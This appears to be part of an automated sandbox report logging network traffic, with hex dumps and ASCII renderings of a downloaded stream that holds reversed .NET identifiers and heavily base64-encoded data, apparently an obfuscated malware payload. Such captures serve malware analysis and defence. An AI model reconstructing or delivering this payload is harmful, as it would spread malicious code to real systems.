                                                                                                                                                                                                  2021-11-18 09:30:21 UTC16INData Raw: 00 73 00 69 00 6f 00 50 00 71 00 6d 00 73 00 4d 00 6c 00 65 00 64 00 6f 00 4d 00 65 00 63 00 69 00 76 00 72 00 65 00 53 00 6d 00 65 00 74 00 73 00 79 00 53 00 38 00 30 00 38 00 39 00 37 00 58 00 35 00 66 00 63 00 42 00 67 00 4e 00 50 00 78 00 38 00 37 00 43 00 79 00 45 00 5a 00 42 00 77 00 73 00 63 00 43 00 7a 00 51 00 63 00 4d 00 78 00 63 00 52 00 66 00 6c 00 4e 00 7a 00 44 00 44 00 38 00 46 00 65 00 77 00 3d 00 3d 00 00 80 97 4a 00 63 00 78 00 45 00 65 00 67 00 61 00 73 00 73 00 65 00 4d 00 6e 00 6f 00 73 00 69 00 6f 00 50 00 71 00 6d 00 73 00 4d 00 6c 00 65 00 64 00 6f 00 4d 00 65 00 63 00 69 00 76 00 72 00 65 00 53 00 6d 00 65 00 74 00 73 00 79 00 53 00 38 00 30 00 38 00 39 00 37 00 6e 00 34 00 77 00 63 00 77 00 41 00 67 00 42 00 54 00 49 00 37 00 42
                                                                                                                                                                                                  Data Ascii: sioPqmsMledoMecivreSmetsyS80897X5fcBgNPx87CyEZBwscCzQcMxcRflNzDD8Few==JcxEegasseMnosioPqmsMledoMecivreSmetsyS80897n4wcwAgBTI7B
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC17INData Raw: 20 01 01 0e 03 00 00 0a 03 00 00 01 08 00 02 01 12 80 8c 1d 1c 05 15 12 21 01 02 05 20 02 01 1c 18 04 20 00 13 00 03 20 00 01 04 06 12 80 8c 03 20 00 02 2b 07 16 02 0f 11 70 0f 11 78 0e 18 18 12 34 11 80 84 11 6c 12 34 11 80 88 18 0a 0b 1d 05 09 11 6c 0f 05 45 1d 05 07 0f 11 80 80 08 02 06 18 05 00 01 18 0f 01 04 00 01 08 1c 04 00 01 18 0a 04 0a 01 12 4c 03 00 00 0e 05 00 02 02 18 18 04 0a 01 12 44 04 0a 01 12 48 04 00 01 01 08 04 0a 01 12 3c 04 0a 01 12 58 04 0a 01 12 5c 04 0a 01 12 40 03 20 00 0a 06 00 01 12 51 11 55 05 00 01 08 12 51 04 0a 01 12 50 04 00 01 18 08 08 00 04 01 1d 05 08 18 08 04 00 01 01 18 04 0a 01 12 54 04 0a 01 12 60 02 06 0a 02 06 1c 02 00 00 05 00 02 0e 0e 06 02 06 0e 05 20 02 0e 0e 0e 03 20 00 0e 03 07 01 0e 08 b0 3f 5f 7f 11 d5 0a
                                                                                                                                                                                                  Data Ascii: ! +px4l4lELDH<X\@ QUQPT` ?_
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC18INData Raw: 73 00 73 00 65 00 4d 00 6e 00 6f 00 73 00 69 00 6f 00 50 00 71 00 6d 00 73 00 4d 00 6c 00 65 00 64 00 6f 00 4d 00 65 00 63 00 69 00 76 00 72 00 65 00 53 00 6d 00 65 00 74 00 73 00 79 00 53 00 38 00 30 00 38 00 39 00 37 00 46 00 5a 00 78 00 55 00 55 00 46 00 42 00 54 00 55 00 46 00 42 00 51 00 55 00 46 00 46 00 51 00 55 00 46 00 42 00 51 00 53 00 38 00 76 00 4f 00 45 00 46 00 42 00 54 00 47 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42
                                                                                                                                                                                                  Data Ascii: sseMnosioPqmsMledoMecivreSmetsyS80897FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC20INData Raw: 00 30 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 7a 00 55 00 77 00 57 00 6c 00 68 00 6f 00 4d 00 45 00 46 00 42 00 51 00 55 00 46 00 78 00 53 00 56 00 6c 00 43 00 51 00 55 00 46 00 42 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 70 00 51 00 55 00 56 00 42 00 51 00 55 00 46 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 30 00 46 00 42 00 51 00 55 00 64 00 42 00 64 00 57 00 4e 00 75 00 54 00 6e 00 6c 00 5a 00 64 00 30 00 46 00 42 00 51 00 55 00 39 00 52 00 52 00 55 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 55 00 56 00 42 00 51 00 55 00 46 00 6e 00 51 00 55 00 46 00 42 00
                                                                                                                                                                                                  Data Ascii: 0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUFxSVlCQUFBZ0FBQUFpQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU9RRUFBQUF3QUVBQUFnQUFB
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC21INData Raw: 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51
                                                                                                                                                                                                  Data Ascii: UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC22INData Raw: 00 46 00 42 00 52 00 53 00 39 00 6e 00 59 00 6d 00 56 00 42 00 55 00 55 00 46 00 48 00 59 00 33 00 68 00 76 00 51 00 55 00 46 00 42 00 62 00 32 00 78 00 6e 00 55 00 47 00 4e 00 42 00 51 00 55 00 46 00 52 00 62 00 30 00 46 00 52 00 51 00 55 00 46 00 4c 00 4d 00 6a 00 68 00 6a 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 36 00 61 00 55 00 5a 00 42 00 5a 00 30 00 46 00 42 00 51 00 6a 00 49 00 34 00 5a 00 45 00 46 00 42 00 51 00 55 00 74 00 47 00 65 00 47 00 4e 00 61 00 61 00 6c 00 5a 00 6e 00 51 00 55 00 46 00 42 00 52 00 57 00 78 00 47 00 62 00 6b 00 6c 00 43 00 51 00 55 00 46 00 43 00 64 00 32 00 4e 00 73 00 61 00 30 00 46 00 42 00 53 00 45 00 49 00 72 00 53 00 47 00 64 00 42 00 51 00 55 00 4e 00 70 00 5a 00 32 00 5a 00 42 00 51 00 55 00 46 00 4c 00 62 00
                                                                                                                                                                                                  Data Ascii: FBRS9nYmVBUUFHY3hvQUFBb2xnUGNBQUFRb0FRQUFLMjhjQUFBS0N6aUZBZ0FBQjI4ZEFBQUtGeGNaalZnQUFBRWxGbklCQUFCd2Nsa0FBSEIrSGdBQUNpZ2ZBQUFLb
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC24INData Raw: 6c 00 42 00 51 00 55 00 46 00 42 00 55 00 6b 00 4a 00 53 00 52 00 55 00 64 00 69 00 65 00 55 00 6c 00 43 00 51 00 55 00 46 00 5a 00 55 00 6b 00 4a 00 53 00 52 00 55 00 68 00 69 00 65 00 56 00 46 00 43 00 51 00 55 00 46 00 5a 00 55 00 6b 00 4a 00 53 00 52 00 55 00 55 00 76 00 5a 00 32 00 4a 00 5a 00 51 00 56 00 46 00 42 00 52 00 32 00 4e 00 35 00 64 00 30 00 46 00 42 00 51 00 58 00 41 00 72 00 4b 00 30 00 46 00 42 00 51 00 55 00 4a 00 44 00 56 00 58 00 52 00 47 00 65 00 56 00 6f 00 72 00 4f 00 57 00 64 00 42 00 51 00 55 00 4a 00 51 00 4e 00 45 00 63 00 7a 00 64 00 30 00 56 00 42 00 51 00 6d 00 35 00 4e 00 64 00 45 00 46 00 42 00 51 00 55 00 74 00 4b 00 57 00 55 00 51 00 30 00 51 00 55 00 46 00 42 00 52 00 55 00 74 00 42 00 53 00 55 00 46 00 42 00 51 00 33
                                                                                                                                                                                                  Data Ascii: lBQUFBUkJSRUdieUlCQUFZUkJSRUhieVFCQUFZUkJSRUUvZ2JZQVFBR2N5d0FBQXArK0FBQUJDVXRGeVorOWdBQUJQNEczd0VBQm5NdEFBQUtKWUQ0QUFBRUtBSUFBQ3
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC25INData Raw: 00 42 00 51 00 55 00 46 00 42 00 62 00 48 00 64 00 4a 00 51 00 55 00 46 00 4e 00 5a 00 30 00 4e 00 42 00 51 00 55 00 46 00 4c 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 30 00 46 00 42 00 51 00 55 00 46 00 36 00 5a 00 30 00 6c 00 42 00 51 00 55 00 35 00 52 00 51 00 30 00 46 00 42 00 51 00 55 00 52 00 42 00 51 00 55 00 46 00 42 00 51 00 32 00 64 00 42 00 51 00 55 00 46 00 53 00 63 00 33 00 64 00 43 00 51 00 55 00 4a 00 6e 00 51 00 56 00 46 00 42 00 51 00 55 00 46 00 6e 00 51 00 55 00 46 00 46 00 57 00 45 00 30 00 79 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 6e 00 53 00 57 00 5a 00 44 00 62 00 7a 00 46 00 68 00 51 00 55 00 46 00 42 00 51 00 6b 00 70 00 6b 00 52 00 46 00
                                                                                                                                                                                                  Data Ascii: BQUFBbHdJQUFNZ0NBQUFLQUFBQUFBQUFBQUFBQUFBR0FBQUF6Z0lBQU5RQ0FBQURBQUFBQ2dBQUFSc3dCQUJnQVFBQUFnQUFFWE0yQUFBS0NnSWZDbzFhQUFBQkpkRF
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC26INData Raw: 33 00 51 00 55 00 46 00 43 00 61 00 6a 00 68 00 58 00 4c 00 79 00 38 00 76 00 4c 00 7a 00 4e 00 6e 00 54 00 57 00 30 00 7a 00 5a 00 30 00 52 00 6c 00 51 00 58 00 6c 00 69 00 5a 00 55 00 46 00 42 00 57 00 58 00 46 00 44 00 55 00 33 00 42 00 43 00 57 00 6b 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 7a 00 68 00 42 00 51 00 55 00 46 00 43 00 52 00 6b 00 46 00 42 00 51 00 55 00 46 00 30 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4e 00 51 00 55 00 46 00 42 00 51 00 56 00 42 00 42 00 51 00 55 00 46 00 43 00 51 00 57 00 64 00 42 00 51 00 55 00 46 00 48 00 4f 00 45 00 46 00 42 00 51 00 55 00 4a 00 4c 00 51 00 55 00 46 00 42 00 51 00 58 00 56 00 52 00 51 00 55 00 46 00 42 00 52 00 32 00 39 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46
                                                                                                                                                                                                  Data Ascii: 3QUFCajhXLy8vLzNnTW0zZ0RlQXliZUFBWXFDU3BCWkFBQUFBQUFBRzhBQUFCRkFBQUF0QUFBQUFNQUFBQVBBQUFCQWdBQUFHOEFBQUJLQUFBQXVRQUFBR29BQUFBQUF
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC28INData Raw: 00 52 00 30 00 56 00 52 00 59 00 31 00 4a 00 43 00 51 00 6b 00 56 00 47 00 53 00 48 00 64 00 74 00 54 00 6c 00 64 00 6e 00 51 00 55 00 46 00 42 00 55 00 31 00 68 00 52 00 4d 00 58 00 64 00 42 00 51 00 55 00 4a 00 44 00 5a 00 7a 00 4e 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 79 00 55 00 55 00 46 00 42 00 51 00 6d 00 35 00 4a 00 4c 00 30 00 46 00 6e 00 51 00 6e 00 64 00 69 00 65 00 56 00 56 00 42 00 51 00 55 00 46 00 77 00 64 00 6b 00 39 00 42 00 52 00 55 00 46 00 43 00 61 00 45 00 56 00 49 00 52 00 56 00 46 00 52 00 55 00 6b 00 4a 00 53 00 4f 00 45 00 78 00 71 00 56 00 6d 00 39 00 42 00 51 00 55 00 46 00 46 00 62 00 44 00 42 00 4d 00 4f 00 45 00 46 00 42 00 51 00 56 00 46 00 76 00 54 00 6e 00 64 00
                                                                                                                                                                                                  Data Ascii: R0VRY1JCQkVGSHdtTldnQUFBU1hRMXdBQUJDZzNBQUFLY3pnQUFBcHZyUUFBQm5JL0FnQndieVVBQUFwdk9BRUFCaEVIRVFRUkJSOExqVm9BQUFFbDBMOEFBQVFvTnd
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC29INData Raw: 51 00 6d 00 64 00 42 00 51 00 55 00 46 00 45 00 59 00 30 00 4e 00 42 00 51 00 55 00 45 00 35 00 51 00 57 00 64 00 42 00 51 00 55 00 46 00 33 00 51 00 55 00 46 00 42 00 51 00 54 00 68 00 42 00 51 00 55 00 46 00 46 00 59 00 6b 00 31 00 42 00 57 00 55 00 46 00 54 00 5a 00 30 00 56 00 42 00 51 00 55 00 46 00 52 00 51 00 55 00 46 00 43 00 52 00 6e 00 70 00 53 00 5a 00 30 00 46 00 42 00 51 00 32 00 64 00 76 00 51 00 30 00 68 00 76 00 4d 00 57 00 46 00 42 00 51 00 55 00 46 00 43 00 53 00 6d 00 52 00 45 00 55 00 45 00 46 00 42 00 51 00 55 00 56 00 4c 00 52 00 47 00 4e 00 42 00 51 00 55 00 46 00 77 00 65 00 6b 00 39 00 42 00 51 00 55 00 46 00 44 00 61 00 57 00 63 00 31 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 33 00 59 00 32 00 39 00 50 00 5a 00 30 00 46 00 42
                                                                                                                                                                                                  Data Ascii: QmdBQUFEY0NBQUE5QWdBQUF3QUFBQThBQUFFYk1BWUFTZ0VBQUFRQUFCRnpSZ0FBQ2dvQ0hvMWFBQUFCSmREUEFBQUVLRGNBQUFwek9BQUFDaWc1QUFBS0N3Y29PZ0FB
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC30INData Raw: 00 30 00 46 00 42 00 51 00 55 00 46 00 76 00 51 00 55 00 46 00 42 00 52 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 54 00 31 00 46 00 42 00 51 00 55 00 46 00 42 00 56 00 55 00 4a 00 42 00 51 00 55 00 45 00 72 00 51 00 56 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 55 00 46 00 42 00 51 00 54 00 68 00 42 00 51 00 55 00 46 00 46 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 43 00 5a 00 30 00 46 00 42 00 51 00 55 00 51 00 77 00 51 00 6b 00 46 00 42 00 51 00 6b 00 52 00 42 00 55 00 55 00 46 00 42 00 51 00 58 00 64 00 42 00 51 00 55 00 46 00 42 00 4f 00 45 00 46 00 42 00 51 00 55 00 56 00 69 00 54 00 55 00 46 00 56 00 51 00 55 00 56 00 42 00 52 00 55 00 46 00 42 00 51 00 56 00 56 00 42 00 51 00 55 00 4a 00 47 00 65 00 6c 00 4e 00 42 00 51 00 55 00 46 00 44 00
                                                                                                                                                                                                  Data Ascii: 0FBQUFvQUFBRUFBQUFBT1FBQUFBVUJBQUErQVFBQUF3QUFBQThBQUFFQUFBQUFCZ0FBQUQwQkFBQkRBUUFBQXdBQUFBOEFBQUViTUFVQUVBRUFBQVVBQUJGelNBQUFD
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC32INData Raw: 55 00 46 00 42 00 52 00 31 00 41 00 79 00 55 00 43 00 38 00 76 00 4c 00 79 00 39 00 6c 00 51 00 58 00 6c 00 69 00 5a 00 55 00 46 00 4f 00 4e 00 45 00 52 00 4b 00 64 00 44 00 52 00 42 00 51 00 6d 00 6c 00 76 00 53 00 6b 00 74 00 72 00 52 00 6b 00 31 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 47 00 4e 00 42 00 51 00 55 00 46 00 45 00 5a 00 6b 00 46 00 42 00 51 00 55 00 46 00 42 00 64 00 30 00 46 00 42 00 51 00 55 00 46 00 76 00 51 00 55 00 46 00 42 00 52 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 54 00 31 00 46 00 42 00 51 00 55 00 46 00 4e 00 63 00 30 00 46 00 42 00 51 00 55 00 46 00 46 00 51 00 56 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 55 00 46 00 42 00 51 00 54 00 68 00 42 00 51
                                                                                                                                                                                                  Data Ascii: UFBR1AyUC8vLy9lQXliZUFONERKdDRBQmlvSktrRk1BQUFBQUFBQWFBQUFBSGNBQUFEZkFBQUFBd0FBQUFvQUFBRUFBQUFBT1FBQUFNc0FBQUFFQVFBQUF3QUFBQThBQ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC33INData Raw: 00 68 00 52 00 65 00 48 00 64 00 42 00 51 00 55 00 4a 00 44 00 5a 00 7a 00 4e 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 62 00 32 00 39 00 50 00 55 00 55 00 46 00 42 00 51 00 32 00 64 00 7a 00 53 00 45 00 74 00 45 00 62 00 30 00 46 00 42 00 51 00 57 00 39 00 30 00 54 00 47 00 64 00 72 00 57 00 46 00 64 00 42 00 4d 00 44 00 52 00 57 00 4c 00 79 00 38 00 76 00 4c 00 33 00 64 00 72 00 57 00 6c 00 46 00 47 00 52 00 43 00 38 00 76 00 4c 00 7a 00 68 00 44 00 53 00 48 00 63 00 72 00 54 00 6c 00 64 00 6e 00 51 00 55 00 46 00 42 00 55 00 31 00 68 00 52 00 65 00 48 00 64 00 42 00 51 00 55 00 4a 00 44 00 5a 00 7a 00 4e 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 62 00 32 00 39 00 50 00 55 00
                                                                                                                                                                                                  Data Ascii: hReHdBQUJDZzNBQUFLY3pnQUFBb29PUUFBQ2dzSEtEb0FBQW90TGdrWFdBMDRWLy8vL3drWlFGRC8vLzhDSHcrTldnQUFBU1hReHdBQUJDZzNBQUFLY3pnQUFBb29PU
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC34INData Raw: 68 00 42 00 51 00 55 00 46 00 42 00 51 00 32 00 64 00 42 00 51 00 55 00 56 00 59 00 54 00 54 00 4a 00 42 00 51 00 55 00 46 00 4c 00 51 00 32 00 64 00 4b 00 65 00 6c 00 5a 00 52 00 51 00 55 00 46 00 44 00 5a 00 33 00 52 00 36 00 56 00 6d 00 64 00 42 00 51 00 55 00 4e 00 70 00 56 00 55 00 68 00 69 00 4d 00 57 00 4e 00 42 00 51 00 55 00 46 00 77 00 64 00 6c 00 64 00 42 00 51 00 55 00 46 00 44 00 62 00 54 00 6c 00 61 00 51 00 55 00 46 00 42 00 53 00 30 00 5a 00 74 00 4f 00 57 00 46 00 42 00 51 00 55 00 46 00 4c 00 59 00 6a 00 46 00 72 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 58 00 64 00 30 00 46 00 42 00 51 00 32 00 64 00 33 00 63 00 6c 00 42 00 42 00 61 00 48 00 5a 00 45 00 64 00 30 00 46 00 42 00 51 00 32 00 35 00 52 00 57 00 45 00 46 00 42 00 51 00 55
                                                                                                                                                                                                  Data Ascii: hBQUFBQ2dBQUVYTTJBQUFLQ2dKelZRQUFDZ3R6VmdBQUNpVUhiMWNBQUFwdldBQUFDbTlaQUFBS0ZtOWFBQUFLYjFrQUFBcHZXd0FBQ2d3clBBaHZEd0FBQ25RWEFBQU
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC36INData Raw: 00 6e 00 5a 00 48 00 5a 00 45 00 51 00 55 00 46 00 42 00 51 00 32 00 70 00 77 00 55 00 79 00 38 00 76 00 4c 00 79 00 38 00 7a 00 61 00 45 00 56 00 49 00 5a 00 46 00 4a 00 5a 00 51 00 55 00 46 00 42 00 52 00 55 00 35 00 44 00 55 00 33 00 64 00 48 00 51 00 31 00 63 00 34 00 54 00 45 00 46 00 42 00 51 00 55 00 73 00 7a 00 54 00 6a 00 56 00 72 00 53 00 6e 00 51 00 31 00 61 00 45 00 4a 00 6e 00 57 00 6e 00 5a 00 54 00 51 00 55 00 56 00 42 00 51 00 6d 00 6c 00 6e 00 62 00 55 00 46 00 42 00 51 00 55 00 74 00 4d 00 55 00 57 00 64 00 48 00 59 00 6a 00 42 00 6e 00 51 00 6b 00 46 00 42 00 57 00 58 00 4a 00 43 00 57 00 45 00 6c 00 79 00 51 00 57 00 64 00 43 00 64 00 32 00 49 00 77 00 61 00 30 00 4a 00 42 00 51 00 56 00 6c 00 48 00 51 00 6d 00 30 00 35 00 53 00 30 00
                                                                                                                                                                                                  Data Ascii: nZHZEQUFBQ2pwUy8vLy8zaEVIZFJZQUFBRU5DU3dHQ1c4TEFBQUszTjVrSnQ1aEJnWnZTQUVBQmlnbUFBQUtMUWdHYjBnQkFBWXJCWElyQWdCd2Iwa0JBQVlHQm05S0
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC37INData Raw: 6f 00 61 00 6b 00 46 00 42 00 51 00 55 00 74 00 69 00 65 00 56 00 56 00 42 00 51 00 55 00 46 00 76 00 64 00 45 00 4e 00 53 00 52 00 55 00 56 00 4c 00 51 00 6b 00 46 00 42 00 51 00 55 00 46 00 5a 00 63 00 6b 00 4a 00 34 00 52 00 55 00 56 00 4c 00 51 00 54 00 68 00 42 00 51 00 55 00 46 00 5a 00 56 00 45 00 4a 00 53 00 52 00 55 00 5a 00 4c 00 51 00 31 00 6c 00 42 00 51 00 55 00 46 00 76 00 64 00 46 00 70 00 59 00 54 00 58 00 56 00 42 00 55 00 55 00 46 00 48 00 53 00 6c 00 4a 00 46 00 52 00 6d 00 4a 00 35 00 53 00 55 00 4a 00 42 00 51 00 56 00 6c 00 73 00 52 00 56 00 46 00 53 00 65 00 6c 00 70 00 42 00 51 00 55 00 46 00 44 00 62 00 54 00 6c 00 73 00 51 00 55 00 46 00 42 00 53 00 32 00 4a 00 35 00 55 00 55 00 4a 00 42 00 51 00 56 00 6c 00 73 00 52 00 56 00 46
                                                                                                                                                                                                  Data Ascii: oakFBQUtieVVBQUFvdENSRUVLQkFBQUFZckJ4RUVLQThBQUFZVEJSRUZLQ1lBQUFvdFpYTXVBUUFHSlJFRmJ5SUJBQVlsRVFSelpBQUFDbTlsQUFBS2J5UUJBQVlsRVF
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC38INData Raw: 00 4e 00 30 00 46 00 42 00 51 00 55 00 4a 00 44 00 5a 00 7a 00 4e 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 79 00 64 00 30 00 46 00 42 00 51 00 6d 00 6c 00 5a 00 56 00 30 00 56 00 33 00 55 00 54 00 52 00 55 00 51 00 55 00 56 00 42 00 51 00 55 00 4a 00 52 00 56 00 45 00 4a 00 52 00 5a 00 31 00 4a 00 43 00 53 00 45 00 6c 00 45 00 51 00 58 00 64 00 43 00 64 00 32 00 4e 00 73 00 56 00 55 00 52 00 42 00 53 00 45 00 49 00 72 00 53 00 47 00 64 00 42 00 51 00 55 00 4e 00 70 00 5a 00 32 00 5a 00 42 00 51 00 55 00 46 00 4c 00 59 00 6a 00 59 00 77 00 51 00 55 00 46 00 42 00 57 00 6e 00 5a 00 50 00 64 00 30 00 46 00 42 00 51 00 32 00 35 00 4e 00 64 00 30 00 46 00 52 00 51 00 55 00 64 00 46 00 64 00 31 00 6c 00
                                                                                                                                                                                                  Data Ascii: N0FBQUJDZzNBQUFLY3pnQUFBcHZyd0FBQmlZV0V3UTRUQUVBQUJRVEJRZ1JCSElEQXdCd2NsVURBSEIrSGdBQUNpZ2ZBQUFLYjYwQUFBWnZPd0FBQ25Nd0FRQUdFd1l
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC40INData Raw: 56 00 46 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 6d 00 70 00 42 00 51 00 55 00 46 00 42 00 54 00 6b 00 46 00 46 00 51 00 55 00 46 00 4b 00 59 00 30 00 4a 00 42 00 51 00 55 00 46 00 45 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 30 00 46 00 42 00 51 00 55 00 46 00 30 00 55 00 55 00 56 00 42 00 51 00 55 00 78 00 7a 00 51 00 6b 00 46 00 42 00 51 00 55 00 52 00 42 00 51 00 55 00 46 00 42 00 51 00 32 00 64 00 42 00 51 00 55 00 46 00 53 00 63 00 33 00 64 00 43 00 55 00 55 00 4a 00 36 00 51 00 55 00 46 00 42 00 51 00 55 00 52 00 6e 00 51 00 55 00 46 00 46 00 57 00 44 00 52 00 6c 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 6e 00 53 00 57 00 5a 00 44
                                                                                                                                                                                                  Data Ascii: VFFBQUFBQUFBQmpBQUFBTkFFQUFKY0JBQUFEQUFBQUNnQUFBUUFBQUFBR0FBQUF0UUVBQUxzQkFBQURBQUFBQ2dBQUFSc3dCUUJ6QUFBQURnQUFFWDRlQUFBS0NnSWZD
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC41INData Raw: 00 57 00 46 00 42 00 51 00 55 00 46 00 43 00 53 00 6d 00 52 00 45 00 5a 00 45 00 46 00 42 00 51 00 55 00 56 00 4c 00 52 00 47 00 4e 00 42 00 51 00 55 00 46 00 77 00 65 00 6b 00 39 00 42 00 51 00 55 00 46 00 44 00 62 00 6b 00 78 00 36 00 51 00 58 00 64 00 43 00 64 00 32 00 5a 00 6f 00 4e 00 45 00 46 00 42 00 51 00 57 00 39 00 76 00 53 00 48 00 64 00 42 00 51 00 55 00 4e 00 70 00 5a 00 7a 00 56 00 42 00 51 00 55 00 46 00 4c 00 59 00 7a 00 4a 00 52 00 51 00 55 00 46 00 42 00 62 00 30 00 78 00 43 00 4d 00 6a 00 6c 00 76 00 51 00 55 00 46 00 42 00 53 00 30 00 78 00 52 00 59 00 30 00 64 00 45 00 54 00 6a 00 4a 00 6a 00 51 00 56 00 46 00 42 00 51 00 55 00 4a 00 34 00 4f 00 46 00 6c 00 71 00 56 00 6d 00 39 00 42 00 51 00 55 00 46 00 46 00 62 00 44 00 42 00 50 00
                                                                                                                                                                                                  Data Ascii: WFBQUFCSmREZEFBQUVLRGNBQUFwek9BQUFDbkx6QXdCd2ZoNEFBQW9vSHdBQUNpZzVBQUFLYzJRQUFBb0xCMjlvQUFBS0xRY0dETjJjQVFBQUJ4OFlqVm9BQUFFbDBP
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC42INData Raw: 6b 00 74 00 45 00 64 00 30 00 46 00 42 00 51 00 57 00 39 00 30 00 53 00 6b 00 4a 00 46 00 54 00 30 00 74 00 45 00 64 00 30 00 46 00 42 00 51 00 57 00 39 00 30 00 52 00 33 00 64 00 61 00 65 00 6c 00 52 00 6e 00 52 00 55 00 46 00 43 00 61 00 56 00 56 00 53 00 52 00 46 00 63 00 35 00 54 00 45 00 46 00 52 00 51 00 55 00 64 00 4b 00 55 00 6b 00 56 00 50 00 59 00 6a 00 41 00 77 00 51 00 6b 00 46 00 42 00 57 00 6e 00 5a 00 51 00 5a 00 30 00 46 00 42 00 51 00 33 00 51 00 30 00 52 00 45 00 70 00 30 00 4e 00 45 00 46 00 46 00 55 00 56 00 6c 00 59 00 56 00 30 00 4a 00 4e 00 52 00 30 00 56 00 52 00 57 00 56 00 4a 00 43 00 57 00 54 00 56 00 77 00 55 00 44 00 68 00 51 00 4b 00 79 00 38 00 76 00 4f 00 46 00 4a 00 43 00 51 00 6d 00 52 00 5a 00 52 00 58 00 64 00 52 00 55
                                                                                                                                                                                                  Data Ascii: ktEd0FBQW90SkJFT0tEd0FBQW90R3daelRnRUFCaVVSRFc5TEFRQUdKUkVPYjAwQkFBWnZQZ0FBQ3Q0REp0NEFFUVlYV0JNR0VRWVJCWTVwUDhQKy8vOFJCQmRZRXdRU
